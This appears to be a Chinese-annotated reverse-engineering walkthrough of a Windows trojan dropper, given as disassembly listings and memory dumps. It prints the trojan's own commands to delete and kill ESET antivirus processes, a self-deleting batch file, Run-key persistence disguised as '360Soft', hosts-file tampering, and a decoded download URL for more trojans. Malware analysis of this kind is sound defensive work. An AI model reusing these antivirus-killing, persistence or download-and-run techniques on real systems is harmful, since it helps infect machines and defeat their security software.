004017BF |. FFD3 call ebx ; \Sleep
004017C1 |. 8B9424 48020000 mov edx, dword ptr [esp+248]
004017C8 |. 52 push edx
004017C9 |. 68 E8104000 push 004010E8 ; 123321
004017CE |. FFD6 call esi
004017D0 |. 55 push ebp
004017D1 |. 68 B0114000 push 004011B0 ; ASCII "\??\C:\WINDOWS\Explorer.EXE"
004017D6 |. FFD6 call esi
004017D8 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004017DC |. 6A 00 push 0 ; /pOverlapped = NULL
004017DE |. 50 push eax ; |pBytesReturned
004017DF |. 6A 00 push 0 ; |OutBufferSize = 0
004017E1 |. 6A 00 push 0 ; |OutBuffer = NULL
004017E3 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
004017E7 |. 6A 08 push 8 ; |InBufferSize = 8
004017E9 |. 51 push ecx ; |InBuffer
004017EA |. 68 14202200 push 222014 ; |IoControlCode = 222014
004017EF |. 57 push edi ; |hDevice
004017F0 |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017F8 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; | |ASCII "\??\C:\WINDOWS\Explorer.EXE"
00401800 |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
00401806 |. 68 B80B0000 push 0BB8 ; 用DeviceIoControl与驱动程序进行通信,包括读和写两种操作
0040180B |. 33F6 xor esi, esi
0040180D |. FFD3 call ebx
0040180F |. 8BC6 mov eax, esi
00401811 |. 5E pop esi
00401812 |. 5D pop ebp
00401813 |. 5B pop ebx
00401814 |. 5F pop edi
00401815 |. 81C4 30020000 add esp, 230
0040181B |. C3 retn
0040181C |> 8B4424 10 mov eax, dword ptr [esp+10]
00401820 |. 5F pop edi
00401821 |. 81C4 30020000 add esp, 230
00401827 \. C3 retn
关键call 4
00401B70 /$ 81EC 14090000 sub esp, 914
00401B76 |. 56 push esi
00401B77 |. 57 push edi
00401B78 |. B9 40000000 mov ecx, 40
00401B7D |. 33C0 xor eax, eax
00401B7F |. 8D7C24 19 lea edi, dword ptr [esp+19]
00401B83 |. C64424 18 00 mov byte ptr [esp+18], 0
00401B88 |. F3:AB rep stos dword ptr es:[edi]
00401B8A |. 66:AB stos word ptr es:[edi]
00401B8C |. AA stos byte ptr es:[edi]
00401B8D |. B9 FF010000 mov ecx, 1FF
00401B92 |. 33C0 xor eax, eax
00401B94 |. 8DBC24 1D010000 lea edi, dword ptr [esp+11D]
00401B9B |. C68424 1C010000 00 mov byte ptr [esp+11C], 0
00401BA3 |. F3:AB rep stos dword ptr es:[edi]
00401BA5 |. 66:AB stos word ptr es:[edi]
00401BA7 |. 8B0D 30134000 mov ecx, dword ptr [401330]
00401BAD |. 66:8B15 34134000 mov dx, word ptr [401334]
00401BB4 |. AA stos byte ptr es:[edi]
00401BB5 |. A1 2C134000 mov eax, dword ptr [40132C]
00401BBA |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401BBF |. 894424 0C mov dword ptr [esp+C], eax ; |
00401BC3 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401BC7 |. 50 push eax ; |PathBuffer
00401BC8 |. 6A 00 push 0 ; |hModule = NULL
00401BCA |. 894C24 18 mov dword ptr [esp+18], ecx ; |
00401BCE |. 66:895424 1C mov word ptr [esp+1C], dx ; |
00401BD3 |. FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00401BD9 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401BE0 |. 68 20134000 push 00401320 ; /@echo off\n\rkl78a.bat
00401BE5 |. 51 push ecx ; |String1
00401BE6 |. FF15 8C104000 call dword ptr [40108C] ; \lstrcpyA
00401BEC |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401BF2 |. BF 0A000000 mov edi, 0A
00401BF7 |> 8D9424 1C010000 /lea edx, dword ptr [esp+11C]
00401BFE |. 68 08134000 |push 00401308 ; @echo kklfa>>11.ca\n\r
00401C03 |. 52 |push edx
00401C04 |. FFD6 |call esi
00401C06 |. 4F |dec edi
00401C07 |.^ 75 EE \jnz short 00401BF7
00401C09 |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C10 |. 68 F8124000 push 004012F8 ; @del 11.ca\n\r
00401C15 |. 50 push eax
00401C16 |. FFD6 call esi
00401C18 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C1F |. 68 F0124000 push 004012F0 ; @del "
00401C24 |. 51 push ecx
00401C25 |. FFD6 call esi
00401C27 |. 8D5424 18 lea edx, dword ptr [esp+18]
00401C2B |. 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401C32 |. 52 push edx
00401C33 |. 50 push eax
00401C34 |. FFD6 call esi
00401C36 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C3D |. 68 EC124000 push 004012EC ; "\n\r@del "
00401C42 |. 51 push ecx
00401C43 |. FFD6 call esi
00401C45 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C4C |. 68 E4124000 push 004012E4 ; @del
00401C51 |. 52 push edx
00401C52 |. FFD6 call esi
00401C54 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401C58 |. 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
00401C5F |. 50 push eax
00401C60 |. 51 push ecx
00401C61 |. FFD6 call esi
00401C63 |. 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401C6A |. 68 DC124000 push 004012DC ; \n\r@exit@del
00401C6F |. 52 push edx
00401C70 |. FFD6 call esi
00401C72 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401C74 |. 6A 00 push 0 ; |Attributes = 0
00401C76 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401C78 |. 6A 00 push 0 ; |pSecurity = NULL
00401C7A |. 6A 00 push 0 ; |ShareMode = 0
00401C7C |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |
00401C80 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00401C85 |. 50 push eax ; |0012EB10 0012EB34 |FileName = "kl78a.bat"
00401C86 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401C8C |. 8D4C24 14 lea ecx, dword ptr [esp+14]
00401C90 |. 6A 00 push 0 ; /pOverlapped = NULL
00401C92 |. 51 push ecx ; |pBytesWritten
00401C93 |. 8D9424 24010000 lea edx, dword ptr [esp+124] ; |
00401C9A |. 8BF0 mov esi, eax ; |
00401C9C |. 68 00080000 push 800 ; |nBytesToWrite = 800 (2048.)
00401CA1 |. 52 push edx ; |Buffer
00401CA2 |. 56 push esi ; |hFile
00401CA3 |. FF15 30104000 call dword ptr [401030] ; \WriteFile
00401CA9 |. 56 push esi ; /hObject
00401CAA |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401CB0 |. 6A 00 push 0
00401CB2 |. 6A 00 push 0
00401CB4 |. 8D4424 10 lea eax, dword ptr [esp+10]
00401CB8 |. 68 E4104000 push 004010E4
00401CBD |. 50 push eax
00401CBE |. 68 C8124000 push 004012C8 ; open
00401CC3 |. 6A 00 push 0
00401CC5 |. E8 76F7FFFF call <动态获得函数地址并运行文件>
00401CCA |. 83C4 18 add esp, 18
00401CCD |. 6A 00 push 0 ; /ExitCode = 0
00401CCF \. FF15 54104000 call dword ptr [401054] ; \ExitProcess
Bat内容:
0012EC48 40 65 63 68 6F 20 6F 66 66 0A 0D 40 65 63 68 6F @echo off..@echo
0012EC58 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012EC68 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012EC78 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012EC88 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012EC98 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECA8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ECB8 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ECC8 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E a..@echo kklfa>>
0012ECD8 31 31 2E 63 61 0A 0D 40 65 63 68 6F 20 6B 6B 6C 11.ca..@echo kkl
0012ECE8 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 65 63 68 6F fa>>11.ca..@echo
0012ECF8 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 61 0A 0D 40 kklfa>>11.ca..@
0012ED08 65 63 68 6F 20 6B 6B 6C 66 61 3E 3E 31 31 2E 63 echo kklfa>>11.c
0012ED18 61 0A 0D 40 64 65 6C 20 31 31 2E 63 61 0A 0D 40 a..@del 11.ca..@
0012ED28 64 65 6C 20 22 43 3A 5C 74 72 6F 6A 61 6E 5C 74 del "C:\trojan\t
0012ED38 72 6F 6A 61 6E 5C 34 31 32 34 38 39 5F 66 6D 30 rojan\412489_fm0
0012ED48 31 2E 65 78 65 22 0A 0D 40 64 65 6C 20 6B 6C 37 1.exe"..@del kl7
0012ED58 38 61 2E 62 61 74 0A 0D 40 65 78 69 74 8a.bat..@exit
0012F3F0 63 6D 64 20 2F 63 20 73 63 20 64 65 6C 65 74 65 cmd /c sc delete
0012F400 20 65 6B 72 6E 00 00 00 63 6D 64 20 2F 63 20 74 ekrn...cmd /c t
0012F410 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 6B 72 6E askkill /im ekrn
0012F420 2E 65 78 65 20 2F 66 7C 63 6D 64 20 2F 63 20 74 .exe /f|cmd /c t
0012F430 61 73 6B 6B 69 6C 6C 20 2F 69 6D 20 65 67 75 69 askkill /im egui
0012F440 2E 65 78 65 20 2F 66 .exe /f
创建文件函数:这个函数被调用了三次,分别创建 44810500.dll、pcidump.sys、45757859.exe文件
00401830 <41>/$ 55 push ebp
00401831 |. 8BEC mov ebp, esp
00401833 |. 83EC 0C sub esp, 0C
00401836 |. 8B4D 08 mov ecx, [arg.1]
00401839 |. A1 C4124000 mov eax, dword ptr [4012C4]
0040183E |. 6A 00 push 0 ; /hTemplateFile = NULL
00401840 |. 6A 00 push 0 ; |Attributes = 0
00401842 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401844 |. 6A 00 push 0 ; |pSecurity = NULL
00401846 |. 6A 00 push 0 ; |ShareMode = 0
00401848 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040184D |. 51 push ecx ; |FileName
0040184E |. 8945 FC mov [local.1], eax ; |
00401851 |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
00401857 |. 85C0 test eax, eax ; 创建 44810500.dll文件
00401859 |. 8945 F4 mov [local.3], eax
0040185C |. 0F84 82000000 je 004018E4
00401862 |. 8B45 0C mov eax, [arg.2]
00401865 |. 53 push ebx
00401866 |. 56 push esi
00401867 |. 8D55 FC lea edx, [local.1]
0040186A |. 57 push edi ; 查找资源
0040186B |. 52 push edx ; /ResourceType
0040186C |. 50 push eax ; |ResourceName
0040186D |. 6A 00 push 0 ; |hModule = NULL
0040186F |. FF15 40104000 call dword ptr [401040] ; \FindResourceA
00401875 |. 8BF8 mov edi, eax
00401877 |. 57 push edi ; /hResource
00401878 |. 6A 00 push 0 ; |hModule = NULL
0040187A |. FF15 3C104000 call dword ptr [40103C] ; \LoadResource
00401880 |. 50 push eax ; /nHandles
00401881 |. 8945 0C mov [arg.2], eax ; |
00401884 |. 33F6 xor esi, esi ; |
00401886 |. FF15 38104000 call dword ptr [401038] ; \SetHandleCount
0040188C |. 8BD8 mov ebx, eax
0040188E |. C645 0B 00 mov byte ptr [ebp+B], 0
00401892 |. 90 nop
00401893 |. 57 push edi ; /hResource
00401894 |. 56 push esi ; |hModule => NULL
00401895 |. FF15 34104000 call dword ptr [401034] ; \SizeofResource
0040189B |. 85C0 test eax, eax
0040189D |. 74 2E je short 004018CD
0040189F |. 90 nop
004018A0 |> 8A0C33 /mov cl, byte ptr [ebx+esi]
004018A3 |. 8D55 F8 |lea edx, [local.2]
004018A6 |. 80F1 06 |xor cl, 6
004018A9 |. 6A 00 |push 0 ; /pOverlapped = NULL
004018AB |. 884D 0B |mov byte ptr [ebp+B], cl ; |
004018AE |. 8B4D F4 |mov ecx, [local.3] ; |
004018B1 |. 52 |push edx ; |pBytesWritten
004018B2 |. 8D45 0B |lea eax, dword ptr [ebp+B] ; |
004018B5 |. 6A 01 |push 1 ; |nBytesToWrite = 1
004018B7 |. 50 |push eax ; |Buffer
004018B8 |. 51 |push ecx ; |hFile
004018B9 |. FF15 30104000 |call dword ptr [401030] ; \WriteFile
004018BF |. 57 |push edi ; /hResource
004018C0 |. 6A 00 |push 0 ; |hModule = NULL
004018C2 |. 46 |inc esi ; |
004018C3 |. FF15 34104000 |call dword ptr [401034] ; \SizeofResource
004018C9 |. 3BF0 |cmp esi, eax
004018CB |.^ 72 D3 \jb short 004018A0
004018CD |> 8B55 0C mov edx, [arg.2]
004018D0 |. 52 push edx ; /hResource
004018D1 |. FF15 2C104000 call dword ptr [40102C] ; \FreeResource
004018D7 |. 8B45 F4 mov eax, [local.3]
004018DA |. 50 push eax ; /hObject
004018DB |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
004018E1 |. 5F pop edi
004018E2 |. 5E pop esi
004018E3 |. 5B pop ebx
004018E4 |> 8BE5 mov esp, ebp
004018E6 |. 5D pop ebp
004018E7 \. C2 0800 retn 8
动态获得函数地址并运行文件函数:每次的LoadLibraryA的dll不一样,shell32.ShellExecuteA,运行的文件也不一样
00401440 <41>/$ 56 push esi
00401441 |. 68 A0124000 push 004012A0 ; /shell32.dll\drivers\gm.dls\??\
00401446 |. FF15 A4104000 call dword ptr [4010A4] ; \LoadLibraryA
0040144C |. 8BF0 mov esi, eax
0040144E |. 68 90124000 push 00401290 ; /ShellExecuteA
00401453 |. 56 push esi ; |hModule
00401454 |. FF15 A8104000 call dword ptr [4010A8] ; \GetProcAddress
0040145A |. 85C0 test eax, eax
0040145C |. 74 27 je short 00401485
0040145E |. 8B4C24 1C mov ecx, dword ptr [esp+1C]
00401462 |. 8B5424 18 mov edx, dword ptr [esp+18]
00401466 |. 51 push ecx
00401467 |. 8B4C24 18 mov ecx, dword ptr [esp+18]
0040146B |. 52 push edx
0040146C |. 8B5424 18 mov edx, dword ptr [esp+18]
00401470 |. 51 push ecx
00401471 |. 8B4C24 18 mov ecx, dword ptr [esp+18]
00401475 |. 52 push edx
00401476 |. 8B5424 18 mov edx, dword ptr [esp+18]
0040147A |. 51 push ecx
0040147B |. 52 push edx
0040147C |. FFD0 call eax ; shell32.ShellExecuteA,运行C:\WINDOWS\temp\Explorer.exe
0040147E |. 56 push esi ; /hLibModule
0040147F |. FF15 B0104000 call dword ptr [4010B0] ; \FreeLibrary
00401485 |> 5E pop esi
00401486 \. C3 retn
44810500.dll文件分析,主要作用结束一些常见的杀毒软件进程
功能在testall函数中实现
100026B0 44810500.testall /$ 6A 00 push 0
100026B2 |. E8 49FFFFFF call 10002600 这个是关键call,有兴趣的同学可以自己分析文件
100026B7 |. 59 pop ecx
100026B8 \. C3 retn
100026B9 90 nop
100026BA 90 nop
100026BB 90 nop
100026BC 90 nop
100026BD 90 nop
100026BE 90 nop
100026BF 90 nop
100026C0 44810500.<ModuleE>/$ E8 9BFEFFFF call 10002560
100026C5 |. 8B4424 04 mov eax, dword ptr [esp+4]
100026C9 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
100026CE |. 68 BC290010 push 100029BC ; |PathBuffer = 44810500.100029BC
100026D3 |. 50 push eax ; |hModule
100026D4 |. FF15 78100010 call dword ptr [<&KERNEL32.GetModuleFileName>; \GetModuleFileNameA
100026DA |. B8 01000000 mov eax, 1
100026DF \. C2 0C00 retn 0C
45757859.exe文件分析,此文件主要下载木马并运行
00400F39 457578>/$ 55 push ebp
00400F3A |. 8BEC mov ebp, esp
00400F3C |. 51 push ecx
00400F3D |. 51 push ecx
00400F3E |. 56 push esi
00400F3F |. 33F6 xor esi, esi ; 1.创建互斥体 "XETTETT......",如果存在则退出,避免病毒重复运行
00400F41 |. 68 D4074000 push 004007D4 ; /MutexName = "XETTETT......"
00400F46 |. 56 push esi ; |InitialOwner => FALSE
00400F47 |. 56 push esi ; |pSecurity => NULL
00400F48 |. FF15 50044000 call dword ptr [<&KERNEL32.CreateMutexA>] ; \CreateMutexA
00400F4E |. FF15 40044000 call dword ptr [<&KERNEL32.GetLastError>] ; [GetLastError
00400F54 |. 3D B7000000 cmp eax, 0B7
00400F59 |. 75 04 jnz short 00400F5F
00400F5B |. 33C0 xor eax, eax
00400F5D |. EB 60 jmp short 00400FBF
00400F5F |> 53 push ebx
00400F60 |. 57 push edi
00400F61 |. E8 45FCFFFF call 00400BAB ; call 1 给当前进程提权
00400F66 |. E8 EAFCFFFF call 00400C55 ; call 2 将wininet.dll复制到%TEMP%,获取网络函数地址
00400F6B |. E8 F8020000 call 00401268 ; call 3 写启动项
00400F70 |. 8B3D 4C044000 mov edi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00400F76 |. 56 push esi ; /pThreadId
00400F77 |. 56 push esi ; |CreationFlags
00400F78 |. 56 push esi ; |pThreadParm
00400F79 |. 68 F10E4000 push 00400EF1 ; |ThreadFunction = 线程1
00400F7E |. 56 push esi ; |StackSize
00400F7F |. 56 push esi ; |pSecurity
00400F80 |. FFD7 call edi ; \CreateThread
00400F82 |. 8D45 FC lea eax, [local.1]
线程1遍历窗口,如果发现"Windows 文件保护"窗口,隐藏WINDOWS文件保护窗口
00400F85 |. 50 push eax ; /pThreadId
00400F86 |. 56 push esi ; |CreationFlags
00400F87 |. 56 push esi ; |pThreadParm
00400F88 |. 68 7D114000 push 0040117D ; |ThreadFunction = 线程2 修改hosts
00400F8D |. 56 push esi ; |StackSize
00400F8E |. 56 push esi ; |pSecurity
00400F8F |. FFD7 call edi ; \CreateThread
00400F91 |. 8B1D 48044000 mov ebx, dword ptr [<&KERNEL32.WaitForSingle>; kernel32.WaitForSingleObject
00400F97 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400F9C |. 50 push eax ; |hObject
00400F9D |. FFD3 call ebx ; \WaitForSingleObject
00400F9F |. 8D45 F8 lea eax, [local.2]
00400FA2 |. 50 push eax ; /pThreadId
00400FA3 |. 56 push esi ; |CreationFlags
00400FA4 |. 56 push esi ; |pThreadParm
00400FA5 |. 68 FF0F4000 push 00400FFF ; |ThreadFunction = 线程3 采集信息
00400FAA |. 56 push esi ; |StackSize
00400FAB |. 56 push esi ; |pSecurity
00400FAC |. FFD7 call edi ; \CreateThread
00400FAE |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00400FB3 |. 50 push eax ; |hObject
00400FB4 |. FFD3 call ebx ; \WaitForSingleObject
00400FB6 |. E8 BC030000 call 00401377 ; call 4 下载木马
00400FBB |. 5F pop edi
00400FBC |. 33C0 xor eax, eax
00400FBE |. 5B pop ebx
00400FBF |> 5E pop esi
00400FC0 |. C9 leave
00400FC1 \. C3 retn
call 1
00400BAB /$ 55 push ebp
00400BAC |. 8BEC mov ebp, esp
00400BAE |. 83EC 14 sub esp, 14
00400BB1 |. FF15 7C044000 call dword ptr [<&KERNEL32.GetCurrentProcess>; [GetCurrentProcess
00400BB7 |. 8D4D FC lea ecx, [local.1]
00400BBA |. 51 push ecx ; /phToken
00400BBB |. 6A 28 push 28 ; |DesiredAccess = TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES
00400BBD |. 50 push eax ; |hProcess
00400BBE |. FF15 04044000 call dword ptr [<&ADVAPI32.OpenProcessToken>>; \OpenProcessToken
00400BC4 |. 85C0 test eax, eax
00400BC6 |. 74 33 je short 00400BFB
00400BC8 |. 8D45 F0 lea eax, [local.4]
00400BCB |. 56 push esi
00400BCC |. 50 push eax ; /pLocalId
00400BCD |. 33F6 xor esi, esi ; |
00400BCF |. 68 00074000 push 00400700 ; |Privilege = "SeDebugPrivilege"
00400BD4 |. 56 push esi ; |SystemName => NULL
00400BD5 |. FF15 00044000 call dword ptr [<&ADVAPI32.LookupPrivilegeVa>; \LookupPrivilegeValueA
00400BDB |. 56 push esi ; /pRetLen => NULL
00400BDC |. 56 push esi ; |pPrevState => NULL
00400BDD |. 8D45 EC lea eax, [local.5] ; |
00400BE0 |. 56 push esi ; |PrevStateSize => 0
00400BE1 |. 50 push eax ; |pNewState
00400BE2 |. 56 push esi ; |DisableAllPrivileges => FALSE
00400BE3 |. FF75 FC push [local.1] ; |hToken
00400BE6 |. C745 EC 0100000>mov [local.5], 1 ; |
00400BED |. C745 F8 0200000>mov [local.2], 2 ; |
00400BF4 |. FF15 14044000 call dword ptr [<&ADVAPI32.AdjustTokenPrivil>; \AdjustTokenPrivileges
00400BFA |. 5E pop esi
00400BFB |> C9 leave
00400BFC \. C3 retn
Call 2
00400C55 /$ 55 push ebp
00400C56 |. 8BEC mov ebp, esp
00400C58 |. 81EC 08020000 sub esp, 208
00400C5E |. 56 push esi
00400C5F |. 8D85 FCFEFFFF lea eax, [local.65]
00400C65 |. 57 push edi
00400C66 |. BE 04010000 mov esi, 104
00400C6B |. 50 push eax ; /Buffer
00400C6C |. 56 push esi ; |BufSize => 104 (260.)
00400C6D |. FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
00400C73 |. 8D85 FCFEFFFF lea eax, [local.65]
00400C79 |. 50 push eax ; /TempName
00400C7A |. 6A 00 push 0 ; |Unique = 0
00400C7C |. 8D85 FCFEFFFF lea eax, [local.65] ; |
00400C82 |. 68 70074000 push 00400770 ; |Prefix = "open"
00400C87 |. 50 push eax ; |Path
00400C88 |. FF15 20044000 call dword ptr [<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
00400C8E |. 8D85 F8FDFFFF lea eax, [local.130]
00400C94 |. 56 push esi ; /BufSize => 104 (260.)
00400C95 |. 50 push eax ; |Buffer
00400C96 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
00400C9C |. 8D85 F8FDFFFF lea eax, [local.130]
00400CA2 |. 68 60074000 push 00400760 ; /StringToAdd = "\wininet.dll"
00400CA7 |. 50 push eax ; |ConcatString
00400CA8 |. FF15 44044000 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00400CAE |. 8D85 FCFEFFFF lea eax, [local.65]
00400CB4 |. 6A 00 push 0 ; /FailIfExists = FALSE
00400CB6 |. 50 push eax ; |NewFileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope14F.tmp"
00400CB7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
00400CBD |. 50 push eax ; |ExistingFileName = "C:\WINDOWS\system32\wininet.dll"
00400CBE |. FF15 70044000 call dword ptr [<&KERNEL32.CopyFileA>] ; \CopyFileA
00400CC4 |. 8D85 FCFEFFFF lea eax, [local.65] ; 将%SystemRoot%\system32\wininet.dll复制到%TEMP%
00400CCA |. 50 push eax ; /FileName
00400CCB |. FF15 74044000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
00400CD1 |. 8BF8 mov edi, eax
00400CD3 |. 85FF test edi, edi
00400CD5 |. 74 4A je short 00400D21 ; 下面获得网络相关函数地址
00400CD7 |. 8B35 78044000 mov esi, dword ptr [<&KERNEL32.GetProcAddres>; kernel32.GetProcAddress
00400CDD |. 68 50074000 push 00400750 ; /ProcNameOrOrdinal = "InternetOpenA"
00400CE2 |. 57 push edi ; |hModule
00400CE3 |. FFD6 call esi ; \GetProcAddress
Call 3
00401318 |. 50 push eax ; /\src = "scvhost.exe"
00401319 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
0040131F |. 50 push eax ; |dest = "C:\WINDOWS\system32\"
00401320 |. E8 7B0E0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401325 |. 83C4 10 add esp, 10
00401328 |. 8D45 F0 lea eax, [local.4]
0040132B |. 50 push eax ; /pHandle
0040132C |. 8D85 B4FDFFFF lea eax, [local.147] ; |
00401332 |. 50 push eax ; |Subkey
00401333 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401338 |. FF15 10044000 call dword ptr [<&ADVAPI32.RegCreateKeyA>] ; \RegCreateKeyA
0040133E |. 5F pop edi
0040133F |. 5E pop esi
00401340 |. 85C0 test eax, eax
00401342 |. 75 28 jnz short 0040136C
00401344 |. 8D85 B8FEFFFF lea eax, [local.82]
0040134A |. 50 push eax ; / /s = "C:\WINDOWS\system32\scvhost.exe"
0040134B |. E8 060E0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401350 |. 59 pop ecx ; 写入启动项
00401351 |. 40 inc eax
00401352 |. 50 push eax ; /BufSize
00401353 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
00401359 |. 50 push eax ; |Buffer
0040135A |. 6A 01 push 1 ; |ValueType = REG_SZ
0040135C |. 6A 00 push 0 ; |Reserved = 0
0040135E |. 68 28084000 push 00400828 ; |ValueName = "360Soft"
00401363 |. FF75 F0 push [local.4] ; |hKey
00401366 |. FF15 0C044000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
0040136C |> FF75 F0 push [local.4] ; /hKey
0040136F |. FF15 08044000 call dword ptr [<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
Call 4
00401377 /$ B8 35224000 mov eax, 00402235
0040137C |. E8 6F0E0000 call 004021F0
00401381 |. 81EC 58070000 sub esp, 758
00401387 |. 53 push ebx
00401388 |. 56 push esi
00401389 |. BE FF000000 mov esi, 0FF
0040138E |. 33DB xor ebx, ebx
00401390 |. 56 push esi ; /n => FF (255.)
00401391 |. 8D85 2CFDFFFF lea eax, [local.181] ; |
00401397 |. 53 push ebx ; |c => 00
00401398 |. 50 push eax ; |s
00401399 |. 895D E4 mov [local.7], ebx ; |
0040139C |. 895D DC mov [local.9], ebx ; |
0040139F |. 895D EC mov [local.5], ebx ; |
004013A2 |. 895D E8 mov [local.6], ebx ; |
004013A5 |. 895D E0 mov [local.8], ebx ; |
004013A8 |. E8 B50D0000 call <jmp.&MSVCRT.memset> ; \memset
004013AD |. 56 push esi ; /n
004013AE |. 8D85 9CF9FFFF lea eax, [local.409] ; |
004013B4 |. 53 push ebx ; |c
004013B5 |. 50 push eax ; |s
004013B6 |. E8 A70D0000 call <jmp.&MSVCRT.memset> ; \memset
004013BB |. 56 push esi ; /n
004013BC |. 8D85 9CFAFFFF lea eax, [local.345] ; |
004013C2 |. 53 push ebx ; |c
004013C3 |. 50 push eax ; |s
004013C4 |. E8 990D0000 call <jmp.&MSVCRT.memset> ; \memset
004013C9 |. 56 push esi ; /n
004013CA |. 8D85 9CF8FFFF lea eax, [local.473] ; |
004013D0 |. 53 push ebx ; |c
004013D1 |. 50 push eax ; |s
004013D2 |. E8 8B0D0000 call <jmp.&MSVCRT.memset> ; \memset
004013D7 |. 68 90010000 push 190 ; /n = 190 (400.)
004013DC |. 8D85 9CFBFFFF lea eax, [local.281] ; |
004013E2 |. 53 push ebx ; |c
004013E3 |. 50 push eax ; |s
004013E4 |. E8 790D0000 call <jmp.&MSVCRT.memset> ; \memset
004013E9 |. 8D85 2CFDFFFF lea eax, [local.181]
004013EF |. 68 68054000 push 00400568 ; /src = "H7CX26h`Ez[aUpvgNT6X2{SToTrRoISXIasuW62gqDOhJjeWVfoeWCCC"
004013F4 |. 50 push eax ; |dest
004013F5 |. E8 6E0D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004013FA |. 83C4 44 add esp, 44
004013FD |. 8D85 9CF9FFFF lea eax, [local.409]
00401403 |. 50 push eax
00401404 |. 8D85 2CFDFFFF lea eax, [local.181]
0040140A |. 50 push eax ; /s
0040140B |. E8 460D0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401410 |. 59 pop ecx
00401411 |. 50 push eax
00401412 |. 8D85 2CFDFFFF lea eax, [local.181]
00401418 |. 50 push eax
00401419 |. E8 15F7FFFF call <解密函数>
0040141E |. 8D85 9CFAFFFF lea eax, [local.345]
00401424 |. 50 push eax
00401425 |. 8D85 9CF9FFFF lea eax, [local.409]
0040142B |. 50 push eax
0040142C |. E8 5DF5FFFF call 0040098E ; 0012F81C 0012FA40 ASCII "NB2ODo6X8iwyiy2OHT3izbIdR+aMlxaMFx0PjgAA"
00401431 |. 8D85 9CF8FFFF lea eax, [local.473]
00401437 |. 50 push eax
00401438 |. 8D85 9CFAFFFF lea eax, [local.345]
0040143E |. 50 push eax
0040143F |. E8 F7F5FFFF call 00400A3B ; 字符处理出http://ad.ittz.net:72/ad.txt
00401444 |. 8D85 9CF8FFFF lea eax, [local.473]
0040144A |. 50 push eax ; /src
0040144B |. 8D85 9CFBFFFF lea eax, [local.281] ; |
00401451 |. 50 push eax ; |dest
00401452 |. E8 110D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401457 |. 8D85 9CFBFFFF lea eax, [local.281]
0040145D |. 50 push eax ; /s
0040145E |. E8 F30C0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401463 |. 83C4 28 add esp, 28
00401466 |. 85C0 test eax, eax
00401468 |. 77 07 ja short 00401471
0040146A |. 33C0 xor eax, eax
0040146C |. E9 DD010000 jmp 0040164E
00401471 |> 8B35 4C044000 mov esi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00401477 |. 57 push edi
00401478 |. BF A11B4000 mov edi, 00401BA1
0040147D |> 8D85 2CFEFFFF /lea eax, [local.117]
